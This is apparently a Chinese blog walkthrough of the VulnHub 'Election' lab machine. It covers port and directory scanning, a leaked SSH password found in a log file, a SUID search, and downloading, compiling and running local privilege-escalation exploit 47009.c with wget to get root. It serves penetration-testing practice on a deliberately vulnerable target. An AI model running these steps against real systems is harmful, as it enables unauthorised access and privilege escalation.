oscp-vulnhub靶机记录-election-walkthrough_mr. m2021的博客-爱代码爱编程
靶机地址:https://www.vulnhub.com/entry/election-1,503/
深入交流学习:webMsec
安装靶机
主机发现
靶机ip 192.168.160.130
信息收集
nmap -sS -sV -A -p- ip -oN election.nmap
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:A9:88:C3 (VMware)
查看80
dirsearch -u ip -r -o report.txt
在robots.txt目录发现
election可访问
得到这个界面,查看了源码,没有发现,继续深入扫目录
在/admin/logs/ 发现system.log
获得love/P@$$w0rd@123
登录SSH
find / -perm -u=s -type f 2>/dev/null
看看SUID提权
searchsploit serv Pri
搭建http
wget 192.168.160.173:1234/47009.c
gcc -o exp 47009.c
./exp
得到root